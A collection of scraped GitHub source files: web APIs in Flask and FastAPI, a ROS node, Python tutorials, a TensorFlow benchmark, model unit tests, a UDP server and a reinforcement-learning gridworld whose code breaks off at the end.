+{"seq_id":"23926506575","text":"import traceback\n\nfrom flask import Blueprint, request, make_response, jsonify\nfrom modules.emprestimo.dao import EmprestimoDao\nfrom modules.emprestimo.modelo import Emprestimo\nfrom util.database import ConnectDB\n\napp_emprestimo = Blueprint('app_emprestimo', __name__)\napp_name = 'emprestimo'\ndao = EmprestimoDao(database=ConnectDB())\n\n@app_emprestimo.route('/{}/'.format(app_name), methods=['GET'])\ndef get_emprestimos():\n    emprestimos = dao.get_all()\n    return make_response(jsonify(emprestimos), 200)\n\n@app_emprestimo.route('/{}/add/'.format(app_name), methods=['POST'])\ndef add_emprestimo():\n    try:\n        data = request.form.to_dict(flat=True)\n        emprestimo = Emprestimo(\n            data_inicio=data.get('data_inicio'),\n            prazo_devolucao=data.get('prazo_devolucao'),\n            data_devolucao=data.get('data_devolucao'),\n            status=data.get('status'),\n            cliente_id=data.get('cliente_id'),\n            funcionario_id=data.get('funcionario_id'),\n            livro_id=data.get('livro_id'))\n        emprestimo = dao.save(emprestimo)\n    except Exception as e:\n        print(e)\n        print(traceback.format_exc())\n        return make_response(\n            {\n                'error': True,\n                'message': str(e)\n            }, 400)\n    return make_response({'id': emprestimo.id}, 201)\n\n@app_emprestimo.route('/{}/<int:id>/'.format(app_name),\n                      methods=['PUT'])\ndef edit_emprestimo(id):\n    data = request.form.to_dict(flat=True)\n    emprestimo = dao.get_by_id(id)\n    if not emprestimo:\n        return make_response({'error': '{} não existe'.format(app_name)}, 404)\n    dao.edit(id, data)\n    emprestimo = dao.get_by_id(id)\n    return make_response(emprestimo, 200)\n\n\n@app_emprestimo.route('/{}/<int:id>/'.format(app_name),\n                      methods=['GET'])\ndef get_emprestimo_by_id(id):\n    emprestimo = dao.get_by_id(id)\n    if not emprestimo:\n        return make_response({'error': '{} não existe'.format(app_name)}, 404)\n    return make_response(emprestimo, 201)\n\n\n@app_emprestimo.route('/{}/delete/<int:id>/'.format(app_name),\n                      methods=['DELETE'])\ndef delete_emprestimo_by_id(id):\n    try:\n        emprestimo = dao.get_by_id(id)\n        dao.delete_by_id(id)\n    except Exception as e:\n        print(e)\n        print(traceback.format_exc())\n        return make_response(\n            {\n                'error': True,\n                'message': str(e)\n            }, 400)\n    return make_response(emprestimo, 201)\n","repo_name":"valdemir08/librazza-api","sub_path":"modules/emprestimo/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5110432697","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport rospy\nfrom composiv_tryouts.msg import hit\nimport random # used to generate a random damage value\n\ndef talker():\n\n    pub = rospy.Publisher(\"hit_topic\", hit, queue_size=10)\n    # this creates a topic named \"hit_topic\" and assigns it to the 
object named pub\n\n    rospy.init_node(\"composiv_talker\", anonymous=True)\n    # defines a node named \"composiv_talker\"\n\n    rate = rospy.Rate(1)\n    # loop rate: 1 Hz\n\n    max_health = 100 # initial health of the player being hit\n\n    while(not rospy.is_shutdown()): \n    # keeps looping as long as the ROS system has not shut down\n    \n        hit_obj = hit()\n        hit_obj.shooter = \"Ahmet\"\n        hit_obj.hitted = \"Alp\"\n        hit_obj.last_damage = random.randint(0, 100)\n        hit_obj.hitted_health = max_health - hit_obj.last_damage\n        # populate the message fields here\n\n        rospy.loginfo(hit_obj) \n        # used to print the data to the terminal\n\n        pub.publish(hit_obj)\n        # publish the message on our topic\n\n        rate.sleep()\n        # keeps the loop running at the rate specified above\n\nif __name__ == '__main__':\n\n    try:\n        talker()\n    except rospy.ROSInterruptException:\n        pass\n","repo_name":"AhmetArdic/EterationCase","sub_path":"workspace/src/composiv_tryouts/scripts/composiv_talker.py","file_name":"composiv_talker.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"74035793965","text":"import os\nimport pprint\nfrom datetime import datetime\nimport requests\nfrom url_utils import gen_from_urls\n\ndef convert2ampm(time24: str) -> str:\n    return datetime.strptime(time24, '%H:%M').strftime('%I:%M%p')\n\n\nif os.path.isfile('bussers.csv'):\n    with open('bussers.csv') as data:\n        ignore = data.readline()\n        flights = {}\n        for line in data:\n            # strip removes whitespace at the start and end of the line (\\t, \\n, \\r)\n            k, v = line.strip().split(',')\n            flights[k.strip()] = v.strip()\n    pprint.pprint(flights)\nelse:\n    print('no file, sorry')\n\n\nflights2 = {}\nfor k, v in flights.items():\n    flights2[convert2ampm(k)] = v.title()\n\n\npprint.pprint(flights2)\n\n\n# list comprehension\nmore_dests = [dest.title() for dest in flights.values()]\n\nprint('more_dest =', more_dests)\n\n# dict comprehension\nmore_flights = {convert2ampm(k): v.title() for k, v in flights.items()}\nprint('more_flights', more_flights)\n\n\njust_freeport = {convert2ampm(k): v.title()\n                 for k, v in flights.items()\n                 if v == 'FREEPORT'}\n\nprint('just_freeport', just_freeport)\n\n\ndests = set(flights.values())\nprint('dests = ', dests)\n\nfor dest in set(flights.values()):\n    print(dest, '->', [k for k, v in flights.items() if v == dest])\n\n\nwhen = {dest: [k for k, v in flights.items() if v == dest] for dest in set(flights.values())}\n\nprint('when =', when)\n\n# set comprehension\nvowels = {'a', 'e', 'i', 'o'}\nmessage = 'Dont forget to pack your towel'\n\nfound = set()\nfor v in vowels:\n    if v in message:\n        found.add(v)\n\nprint('found = ', found)\nfound2 = { v for v in vowels if v in message}\n\nprint('found2 = ', found2)\n\n\n# ---\n\nurls = ('http://headfirstlabs.com', 'http://twitter.com', 'http://facebook.com')\n# a list comprehension forces the for loop to wait until the whole list is built: [] -> the list is materialized first\n# only once the list is complete does the for loop start printing the data in it\n# for resp in [requests.get(url) for url in urls]:\n#     print(len(resp.content), '->', resp.status_code, '->', resp.url)\n# a generator expression yields values one at a time: as soon as the first value is produced it is handed to the for loop,\n# so it is very responsive and makes sense when you have a lot of data and cannot wait for billions of items to be\n# collected into a list first\n\n\n# for resp in (requests.get(url) for url in urls):\n#     print(len(resp.content), '->', resp.status_code, '->', 
resp.url)\n\n\nfor resp_len, status, url, in gen_from_urls(urls):\n print(resp_len, status, url)","repo_name":"VadimSadriev/PythonLearning","sub_path":"Basics/Generators.py","file_name":"Generators.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70842863408","text":"import numpy as np\nimport argparse\n\nfrom tensorflow.keras.layers import Input, Flatten, Dense, Reshape, Dropout, Embedding, Multiply, Activation, Conv2D, ZeroPadding2D, LocallyConnected2D, Concatenate, GRU, Lambda\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import LeakyReLU\nfrom tensorflow.keras.models import Model, Sequential\nfrom tensorflow.compat.v1.keras.layers import UpSampling2D\n\nimport tensorflow as tf\nimport time\nfrom tensorflow.keras import backend as K\n\nprint(tf.__version__)\n\nloops_to_do = int(3E5)\n\n\n# List of batch sizes to test\nbatch_size_i_array = np.logspace(0,4,10)\n\n\nmake_x_particles = False\nloops = 100\n\n\n''' Create the network. '''\nlatent_size = 200\n\nloc = Sequential([\n Dense(128 * 7 * 7, input_dim=latent_size),\n Reshape((7, 7, 128)),\n\n Conv2D(64, (5, 5), padding='same', kernel_initializer='he_uniform'),\n LeakyReLU(),\n BatchNormalization(),\n UpSampling2D(size=(2, 2),interpolation='bilinear'),\n\n ZeroPadding2D((2, 2)),\n LocallyConnected2D(6, (5, 5), kernel_initializer='he_uniform'),\n LeakyReLU(),\n BatchNormalization(),\n UpSampling2D(size=(2, 2),interpolation='bilinear'),\n\n LocallyConnected2D(6, (3, 3), kernel_initializer='he_uniform'),\n LeakyReLU(),\n LocallyConnected2D(1, (2, 2), use_bias=False, kernel_initializer='glorot_normal'),\n Activation('relu')\n])\n\nlatent = Input(shape=(latent_size, ))\n\nimage_class = Input(shape=(1, ), dtype='int32')\nemb = Flatten()(Embedding(2, latent_size, input_length=1,\n embeddings_initializer='glorot_normal')(image_class))\n\nh = Multiply()([latent, emb])\n\nfake_image = loc(h)\n\ngenerator = Model(inputs=[latent, image_class], outputs=[fake_image])\n\ngenerator.summary()\n\n\n\n\nfor batch_size_i in batch_size_i_array:\n\n\n\tbatch_size = int(batch_size_i)\n\tbatchsize = int(batch_size_i)\n\n\tprint(' ')\n\tprint(batch_size)\n\n\n\t@tf.function(experimental_relax_shapes=True)\n\tdef body(loop_index, output):\n\n\t\tnoise = tf.random.normal((batchsize, 200), 0, 1)\n\t\tclass_i = tf.ones((batchsize, 1))\n\n\t\tlogits = generator([noise, class_i], training=False)\n\n\t\tcombined_output = tf.squeeze(logits,axis=-1)\t\t\t\n\n\t\treturn [loop_index+1, tf.concat([output, combined_output], axis=0)]\n\n\tprint(loops_to_do/batchsize)\n\n\n\tprint('warming up1')\n\tloop_index = tf.constant(0)\n\n\toutput = tf.zeros([0, 25, 25], dtype=tf.float32)\n\t\n\tcondition_func = lambda loop_index, output: loop_index < 1\n\tt0 = time.time()\n\tgenerated_training = tf.while_loop(condition_func, body, loop_vars=[loop_index, output])[1]\n\tt1 = time.time()\n\ttotal_time = t1-t0\n\tprint('warm up1',np.shape(generated_training),'time',total_time)\n\n\n\n\tprint('warming up')\n\tloop_index = tf.constant(0)\n\n\toutput = tf.zeros([0, 25, 25], dtype=tf.float32)\n\t\n\tif make_x_particles == True:\n\t\tcondition_func = lambda loop_index, output: tf.shape(output)[0] < loops_to_do\n\telif make_x_particles == False:\n\t\tcondition_func = lambda loop_index, output: loop_index < loops\n\tt0 = time.time()\n\tgenerated_training = tf.while_loop(condition_func, body, loop_vars=[loop_index, output])[1]\n\tt1 = 
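
# --- Aside (added, illustrative): the laziness described in the comments of
# the Generators.py record above can be observed directly. A generator
# expression produces values on demand, while a list comprehension builds
# everything up front before the loop runs.
squares_gen = (n * n for n in range(1_000_000))  # nothing computed yet
print(next(squares_gen))                         # 0 -- produced on demand
print(next(squares_gen))                         # 1
squares_list = [n * n for n in range(10)]        # fully built before use
print(squares_list[:3])                          # [0, 1, 4]
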
time.time()\n\ttotal_time = t1-t0\n\tprint('warm up',np.shape(generated_training),'time',total_time)\n\n\n\n\tprint('Starting test...')\n\tloop_index = tf.constant(0)\n\n\toutput = tf.zeros([0, 25, 25], dtype=tf.float32)\n\n\t\n\tif make_x_particles == True:\n\t\tcondition_func = lambda loop_index, output: tf.shape(output)[0] < loops_to_do\n\telif make_x_particles == False:\n\t\tcondition_func = lambda loop_index, output: loop_index < loops\n\tt0 = time.time()\n\tgenerated_training = tf.while_loop(condition_func, body, loop_vars=[loop_index, output])[1]\n\tt1 = time.time()\n\tprint(np.shape(generated_training))\n\n\ttotal_time = t1-t0\n\n\tpoints_in_5_mins = (np.shape(generated_training)[0]/total_time)\n\tprint('Time to generate %d points: %.3fs'%(np.shape(generated_training)[0],total_time))\n\n\tprint('Points generated in 5 mins: %d'%int(points_in_5_mins),'batch_size',batch_size)\n\n\n\twith open(\"results_lagans.txt\", \"a\") as myfile:\n\t\tmyfile.write('%d, %.2f \\n'%(batch_size, points_in_5_mins))\n\n\n\n","repo_name":"dpohanlon/IPU4HEP","sub_path":"event_generation/INFERENCE_CPU_GPU_lagans.py","file_name":"INFERENCE_CPU_GPU_lagans.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17274136568","text":"class Polynomial:\n def __init__(self, data):\n self.data = [[data[i], len(data)-i-1] for i in range(len(data))]\n self.refine()\n\n def __repr__(self):\n r = \"\"\n for coeff, deg in self.data:\n if coeff > 0:\n r += \"+\"\n coeff = str(coeff)\n deg = \"^\" + str(deg)\n if coeff == \"1\":\n coeff = \"\"\n elif coeff == \"-1\":\n coeff = \"-\"\n if deg == \"^1\":\n deg = \"\"\n elif deg == \"^0\":\n deg = \"\\b \"\n if coeff == \"\":\n coeff = \"1\"\n r += coeff + \"x\" + deg + \" \"\n if len(r):\n if r[0] == \"+\":\n return r[1:]\n else:\n return r\n else:\n return \"0\"\n\n def refine(self):\n data2 = []\n k = []\n for term in self.data:\n k.append(term[1])\n k = list(set(k))[::-1]\n for element in k:\n s = 0\n for term in self.data:\n if element == term[1]:\n s += term[0]\n data2.append([s, element])\n # print(data2)\n self.data = data2\n\n def multiply(self, pol):\n pol1 = self.data\n pol2 = pol.data\n product = []\n for term1 in pol1:\n for term2 in pol2:\n t = [term1[0]*term2[0], term1[1]+term2[1]]\n product.append(t)\n return Polynomial(product)\n\n\nclass MultiPolynomial:\n def __init__(self, data):\n self.data = data\n self.refine()\n\n def __repr__(self): # [[1, 2, 0], [1, 1, 1], [1, 0, 2]]\n r = \"\"\n for term in self.data:\n coeff = term[0]\n degrees = term[1:]\n \n # working with coeff\n if coeff>1:\n coeff = \"+\" + str(coeff) + \"*\"\n elif coeff == 1:\n if sum(degrees):\n coeff = \"+\"\n else:\n coeff = \"+1\"\n else:\n coeff = str(coeff)\n r += coeff\n \n if coeff != \"0\":\n # working with degrees\n for var, degree in enumerate(degrees):\n if degree != 0:\n if degree != 1:\n r += f\"x{var+1}^{degree}*\"\n else:\n r += f\"x{var+1}*\"\n if r[-1]==\"*\": r += \"\\b \"\n if len(r):\n if r[0] == \"+\":\n return r[1:]\n else:\n return r\n else:\n return \"0\"\n\n def refine(self):\n A = self.data\n powers = []\n for term in A:\n powers.append(str(term[1:]))\n powers = list(set(powers))\n ans = []\n for power in powers:\n s = 0\n for term in A:\n if power == str(term[1:]):\n s += term[0]\n ans.append([s]+eval(power))\n ans = sorted(ans, key=lambda x: sum(x[1:]), reverse=True)\n self.data = ans\n\n def multiply(self, pol):\n A = self.data\n B = pol.data\n ans = []\n for 
term1 in B:\n for term2 in A:\n t = []\n t.append(term1[0]*term2[0])\n for i in range(1, len(A[0])):\n # print(f\"\\t\\tterm1 = {term1}\")\n # print(f\"\\t\\tterm2 = {term2}\")\n X = term1[i]+term2[i]\n # print(f\"\\t{X}\")\n t.append(X)\n ans.append(t)\n # print(ans)\n return MultiPolynomial(ans)\n\n\n\nif __name__ == \"__main__\":\n # pol1 = MultiPolynomial([[1, 1, 0, 0],\n # [1, 0, 1, 0]])\n\n # pol2 = MultiPolynomial([[1, 1, 0, 0],\n # [1, 0, 0, 1]])\n\n # pol3 = MultiPolynomial([[1, 0, 1, 0],\n # [1, 0, 0, 1]])\n\n # print(\"pol1 =\", pol1)\n # print(\"pol2 =\", pol2)\n # print(\"pol3 =\", pol3)\n\n # result = pol1.multiply(pol2).multiply(pol3)\n\n # print(\"product =\", result)\n \n print(Polynomial([1, 2, 5, 0, 6]))","repo_name":"PeithonKing/comp_phys_P346","sub_path":"library/polynomial_multiplication.py","file_name":"polynomial_multiplication.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26866106380","text":"import team_paths\r\n\r\nfout = file('illinois.html', 'w')\r\nfout.write('Illinois Numbers\\n')\r\nfout.write('
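
# --- Aside (added, illustrative): a usage sketch for the Polynomial class in
# the record above, assuming it is in scope. Coefficients are given highest
# degree first; note that __repr__ uses a backspace hack for degree-0 terms,
# so the printed output can look slightly odd in some terminals.
p = Polynomial([2, 1])   # represents 2x + 1
q = Polynomial([1, 1])   # represents x + 1
print(p.multiply(q))     # 2x^2 + 3x + 1, modulo the display quirks above
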
\\n')\r\nfout.write('Find the Illinois number of:
\\n')\r\nfout.write('
')\r\n","repo_name":"llimllib/personal_code","sub_path":"python/illinois_number/htmlgen.py","file_name":"htmlgen.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"2"} +{"seq_id":"36093724008","text":"from fastapi import FastAPI\nfrom sqlalchemy import create_engine, Column, Integer, String, Float, select, DateTime\nfrom databases import Database\nfrom pydantic import BaseModel,validator\nfrom datetime import datetime\n\nDATABASE_URL = \"sqlite:///./memory_usage.db\"\ndatabase = Database(DATABASE_URL)\n\napp = FastAPI(\n title=\"FastAPI Monitor Memory\",\n description=\"develop by Jafar Esmaili\",\n contract={\n \"name\": \"Jafar Esmaili\",\n \"url\": \"devcoach.ir\",\n \"email\": \"jaffar9898@gmail.com\",\n },\n version=\"0.0.1\"\n)\n\n\n# Define a SQLAlchemy model\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\n\nclass MemoryReport(Base):\n \"\"\"\n Represents a memory report entity.\n\n Attributes:\n id (int): The unique identifier for the memory report.\n used (float): The amount of used memory.\n free (float): The amount of free memory.\n total (float): The total available memory.\n timestamp (datetime): The timestamp of the memory report.\n \"\"\"\n __tablename__ = \"memory_report\"\n id = Column(Integer, primary_key=True, index=True)\n used = Column(Float)\n free = Column(Float)\n total = Column(Float)\n timestamp = Column(DateTime)\n\n\n\n# Function to connect to the database\nasync def connect_to_db():\n \"\"\"\n Asynchronously connect to the database.\n \"\"\"\n await database.connect()\n\n\n# Function to disconnect from the database\nasync def close_db_connection():\n \"\"\"\n Asynchronously disconnect to the database.\n \"\"\"\n await database.disconnect()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await connect_to_db()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await close_db_connection()\n\n\nclass MemoryReportResponse(BaseModel):\n \"\"\"\n Represents a response model for a memory report.\n\n Attributes:\n id (int): The unique identifier for the memory report.\n used (float): The amount of used memory.\n free (float): The amount of free memory.\n total (float): The total available memory.\n timestamp (datetime): The timestamp of the memory report.\n \"\"\"\n id: int\n used: float\n free: float\n total: float\n timestamp: datetime\n\n@app.get(\"/memory-reports/\")\nasync def get_items():\n \"\"\"\n Retrieve a list of memory reports from the database.\n\n Returns:\n List[MemoryReportResponse]: A list of memory report responses.\n \"\"\"\n query = select([MemoryReport])\n results = await database.fetch_all(query)\n item_responses = [MemoryReportResponse(**result) for result in results]\n\n return item_responses\n","repo_name":"esmaily/memry-monitor","sub_path":"async_main.py","file_name":"async_main.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36074568338","text":"from copy import deepcopy\nfrom unittest import TestCase\n\nimport torch\n\nfrom mmpretrain.models.backbones import DaViT\nfrom mmpretrain.models.backbones.davit import SpatialBlock\n\n\nclass TestDaViT(TestCase):\n\n def setUp(self):\n self.cfg = dict(arch='t', patch_size=4, drop_path_rate=0.1)\n\n def test_structure(self):\n # Test invalid default arch\n with self.assertRaisesRegex(AssertionError, 'not in default archs'):\n cfg = deepcopy(self.cfg)\n 
cfg['arch'] = 'unknown'\n DaViT(**cfg)\n\n # Test invalid custom arch\n with self.assertRaisesRegex(AssertionError, 'Custom arch needs'):\n cfg = deepcopy(self.cfg)\n cfg['arch'] = {\n 'num_layers': 24,\n 'num_heads': 16,\n 'feedforward_channels': 4096\n }\n DaViT(**cfg)\n\n # Test custom arch\n cfg = deepcopy(self.cfg)\n cfg['arch'] = {\n 'embed_dims': 64,\n 'num_heads': [3, 3, 3, 3],\n 'depths': [1, 1, 2, 1]\n }\n model = DaViT(**cfg)\n self.assertEqual(model.embed_dims, 64)\n self.assertEqual(model.num_layers, 4)\n for layer in model.stages:\n self.assertEqual(\n layer.blocks[0].spatial_block.attn.w_msa.num_heads, 3)\n\n def test_init_weights(self):\n # test weight init cfg\n cfg = deepcopy(self.cfg)\n cfg['init_cfg'] = [\n dict(\n type='Kaiming',\n layer='Conv2d',\n mode='fan_in',\n nonlinearity='linear')\n ]\n model = DaViT(**cfg)\n ori_weight = model.patch_embed.projection.weight.clone().detach()\n\n model.init_weights()\n initialized_weight = model.patch_embed.projection.weight\n self.assertFalse(torch.allclose(ori_weight, initialized_weight))\n\n def test_forward(self):\n imgs = torch.randn(1, 3, 224, 224)\n\n cfg = deepcopy(self.cfg)\n model = DaViT(**cfg)\n outs = model(imgs)\n self.assertIsInstance(outs, tuple)\n self.assertEqual(len(outs), 1)\n self.assertEqual(outs[0].shape, (1, 768, 7, 7))\n\n # Test forward with multi out indices\n cfg = deepcopy(self.cfg)\n cfg['out_indices'] = [2, 3]\n model = DaViT(**cfg)\n outs = model(imgs)\n self.assertIsInstance(outs, tuple)\n self.assertEqual(len(outs), 2)\n self.assertEqual(outs[0].shape, (1, 384, 14, 14))\n self.assertEqual(outs[1].shape, (1, 768, 7, 7))\n\n # test with checkpoint forward\n cfg = deepcopy(self.cfg)\n cfg['with_cp'] = True\n model = DaViT(**cfg)\n for m in model.modules():\n if isinstance(m, SpatialBlock):\n self.assertTrue(m.with_cp)\n model.init_weights()\n model.train()\n\n outs = model(imgs)\n self.assertIsInstance(outs, tuple)\n self.assertEqual(len(outs), 1)\n self.assertEqual(outs[0].shape, (1, 768, 7, 7))\n\n # Test forward with dynamic input size\n imgs1 = torch.randn(1, 3, 224, 224)\n imgs2 = torch.randn(1, 3, 256, 256)\n imgs3 = torch.randn(1, 3, 256, 309)\n cfg = deepcopy(self.cfg)\n model = DaViT(**cfg)\n for imgs in [imgs1, imgs2, imgs3]:\n outs = model(imgs)\n self.assertIsInstance(outs, tuple)\n self.assertEqual(len(outs), 1)\n expect_feat_shape = (imgs.shape[2] // 32, imgs.shape[3] // 32)\n self.assertEqual(outs[0].shape, (1, 768, *expect_feat_shape))\n","repo_name":"open-mmlab/mmpretrain","sub_path":"tests/test_models/test_backbones/test_davit.py","file_name":"test_davit.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":2849,"dataset":"github-code","pt":"27"} +{"seq_id":"14664745351","text":"from socket import socket, AF_INET, SOCK_DGRAM\nimport UDP_Common as common\n\n# LoopBack Address and Port Number Set here.\nUDP_IP = \"127.0.0.1\"\nUDP_PORT = 6005\n\n\n# Create the socket\nsock = socket(AF_INET, SOCK_DGRAM)\nsock.bind((UDP_IP, UDP_PORT))\n\n# Initial message has sequence number 0.\nexpected_seq = 0\n\n\nwhile True:\n # Receive Data\n data, addr = sock.recvfrom(1024) # Buffer size is 1024 bytes.\n UDP_Packet = common.unpack(data)\n print(\"Message from Client:\", UDP_Packet)\n\n # Create the Checksum for comparison.\n values = [UDP_Packet[0], UDP_Packet[1], UDP_Packet[2]]\n chksum = common.create_checksum(values)\n\n # Compare Checksums to test for corrupt data.\n if UDP_Packet[3] == chksum:\n print('CheckSums Match, Packet OK')\n\n 
ack_values = [1, UDP_Packet[1], b'']\n\n        # If expected sequence number then update for new expected seq.\n        if UDP_Packet[1] == expected_seq:\n            expected_seq = 1 - expected_seq\n\n    else:\n        print('Checksums do not match. Packet Corrupt.')\n\n        ack_values = [1, 1-expected_seq, b'']\n\n    # Create the Checksum for the message and build the packet.\n    chksum = common.create_checksum(ack_values)\n    pkt = common.buildpacket(ack_values, chksum)\n\n    # Print the packet contents and send to client.\n    print(\"Message to Client: \", common.unpack(pkt))\n    sock.sendto(pkt, addr)\n","repo_name":"mshubat/networking","sub_path":"rdtwithudp/UDP_Server.py","file_name":"UDP_Server.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"72684040391","text":"\"\"\"\nWrite a program to input the size of the square matrix and create the matrix with random numbers and convert a square matrix \ninto a lower triangular matrix.\n\nInput:\n4\n12 2 5 6\n10 11 4 1\n32 1 4 10\n1 2 10 9\n\nOutput:\n12 0 0 0\n10 11 0 0\n32 1 4 0\n1 2 10 9\n\"\"\"\nimport random\n\nwhile True:\n    r = int(input(\"Enter the number of rows: \"))\n    c = int(input(\"Enter the number of columns: \"))\n    if(r==c):\n        rows = r + 1\n        col = c + 1\n        break\n    else:\n        print(\"Please enter the same number of rows and columns to generate a square matrix\")\n        continue\n    \ncount = 0\nlist = [[random.randrange(1,50,1) for i in range(1,rows)] for j in range(1,col)]\n\nfor i in range(len(list)):\n    for j in range(len(list[i])):\n    \n        print(list[i][j],end = \" \")\n    print()\n    \nprint(\"\\nThe lower triangular matrix of the generated matrix is : \\n\")\n    \nfor i in range(len(list)):\n    for j in range(len(list[i])):\n    \n        if(i < j):\n            list[i][j] = 0\n        print(list[i][j], end = \" \")\n    print()\n    \n","repo_name":"malladi2610/Python_programs","sub_path":"Assignment_programs/Assignment_1/Assignment2.3.py","file_name":"Assignment2.3.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"6637110162","text":"import numpy as np\n\n# logsumexp() and expit() are used because they are\n# numerically stable\n# expit() is the sigmoid function\nfrom scipy.misc import logsumexp\nfrom scipy.special import expit\n\nfrom time import sleep\n\nfrom IPython.display import clear_output\nimport matplotlib.pyplot as plt\n\nclass FourRooms:\n\n\tdef __init__(self):\n\t\tlayout = \"\"\"\\\nwwwwwwwwwwwww\nw     w     w\nw     w     w\nw           w\nw     w     w\nw     w     w\nww wwww     w\nw     www www\nw     w     w\nw     w     w\nw           w\nw     w     w\nwwwwwwwwwwwww\n\"\"\"\n\t\tself.occupancy = np.array([list(map(lambda c: 1 if c=='w' else 0, line)) for line in layout.splitlines()])\n\t\t\n\t\t# Four possible actions\n\t\t# 0: UP\n\t\t# 1: DOWN\n\t\t# 2: LEFT\n\t\t# 3: RIGHT\n\t\tself.action_space = np.array([0, 1, 2, 3])\n\t\tself.observation_space = np.zeros(np.sum(self.occupancy == 0))\n\t\tself.directions = [np.array((-1,0)), np.array((1,0)), np.array((0,-1)), np.array((0,1))]\n\n\t\t# Random number generator\n\t\tself.rng = np.random.RandomState(1234)\n\n\t\tself.tostate = {}\n\t\tstatenum = 0\n\t\tfor i in range(13):\n\t\t\tfor j in range(13):\n\t\t\t\tif self.occupancy[i,j] == 0:\n\t\t\t\t\tself.tostate[(i,j)] = statenum\n\t\t\t\t\tstatenum += 1\n\t\tself.tocell = {v:k for k, v in self.tostate.items()}\n\n\n\t\tself.goal = 62 # East doorway\n\t\tself.init_states = list(range(self.observation_space.shape[0]))\n\t\tself.init_states.remove(self.goal)\n\n\n\tdef render(self, 
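
# --- Aside (added, illustrative): NumPy ships the same lower-triangular
# masking as the loop in the exercise above. np.tril zeroes everything above
# the main diagonal, which makes a handy cross-check against the expected
# output in the docstring.
import numpy as np

m = np.array([[12, 2, 5, 6],
              [10, 11, 4, 1],
              [32, 1, 4, 10],
              [1, 2, 10, 9]])
print(np.tril(m))  # matches the lower-triangular output shown above
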
show_goal=True):\n\t\tcurrent_grid = np.array(self.occupancy)\n\t\tcurrent_grid[self.current_cell[0], self.current_cell[1]] = -1\n\t\tif show_goal:\n\t\t\tgoal_cell = self.tocell[self.goal]\n\t\t\tcurrent_grid[goal_cell[0], goal_cell[1]] = -1\n\t\treturn current_grid\n\n\tdef reset(self):\n\t\tstate = self.rng.choice(self.init_states)\n\t\tself.current_cell = self.tocell[state]\n\t\treturn state\n\n\tdef check_available_cells(self, cell):\n\t\tavailable_cells = []\n\n\t\tfor action in range(len(self.action_space)):\n\t\t\tnext_cell = tuple(cell + self.directions[action])\n\n\t\t\tif not self.occupancy[next_cell]:\n\t\t\t\tavailable_cells.append(next_cell)\n\n\t\treturn available_cells\n\t\t\n\n\tdef step(self, action):\n\t\t'''\n\t\tTakes a step in the environment with 2/3 probability. And takes a step in the\n\t\tother directions with probability 1/3 with all of them being equally likely.\n\t\t'''\n\n\t\tnext_cell = tuple(self.current_cell + self.directions[action])\n\n\t\tif not self.occupancy[next_cell]:\n\n\t\t\tif self.rng.uniform() < 1/3:\n\t\t\t\tavailable_cells = self.check_available_cells(self.current_cell)\n\t\t\t\tself.current_cell = available_cells[self.rng.randint(len(available_cells))]\n\n\t\t\telse:\n\t\t\t\tself.current_cell = next_cell\n\n\t\tstate = self.tostate[self.current_cell]\n\n\t\t# When goal is reached, it is done\n\t\tdone = state == self.goal\n\n\n\t\treturn state, float(done), done, None\n\n\n \nclass EpsGreedyPolicy():\n\n\tdef __init__(self, rng, nstates, noptions, epsilon):\n\t\tself.rng = rng\n\t\tself.nstates = nstates\n\t\tself.noptions = noptions\n\t\tself.epsilon = epsilon\n\t\tself.Q_Omega_table = np.zeros((nstates, noptions))\n\n\tdef Q_Omega(self, state, option=None):\n\t\tif option is None:\n\t\t\treturn self.Q_Omega_table[state,:]\n\t\telse:\n\t\t\treturn self.Q_Omega_table[state, option]\n\n\tdef sample(self, state):\n\t\tif self.rng.uniform() < self.epsilon:\n\t\t\treturn int(self.rng.randint(self.noptions))\n\t\telse:\n\t\t\treturn int(np.argmax(self.Q_Omega(state)))\n\n\nclass SoftmaxPolicy():\n\n\tdef __init__(self, rng, lr, nstates, nactions, temperature=1.0):\n\t\tself.rng = rng\n\t\tself.lr = lr\n\t\tself.nstates = nstates\n\t\tself.nactions = nactions\n\t\tself.temperature = temperature\n\t\tself.weights = np.zeros((nstates, nactions))\n\n\tdef Q_U(self, state, action=None):\n\t\tif action is None:\n\t\t\treturn self.weights[state,:]\n\t\telse:\n\t\t\treturn self.weights[state, action]\n\n\tdef pmf(self, state):\n\t\texponent = self.Q_U(state) / self.temperature\n\t\treturn np.exp(exponent - logsumexp(exponent))\n\n\tdef sample(self, state):\n\t\treturn int(self.rng.choice(self.nactions, p=self.pmf(state)))\n\n\tdef gradient(self):\n\t\tpass\n\n\tdef update(self, state, action, Q_U):\n\t\tactions_pmf = self.pmf(state)\n\t\tself.weights[state, :] -= self.lr * actions_pmf * Q_U\n\t\tself.weights[state, action] += self.lr * Q_U\n\n\nclass SigmoidTermination():\n\n\tdef __init__(self, rng, lr, nstates):\n\t\tself.rng = rng\n\t\tself.lr = lr\n\t\tself.nstates = nstates\n\t\tself.weights = 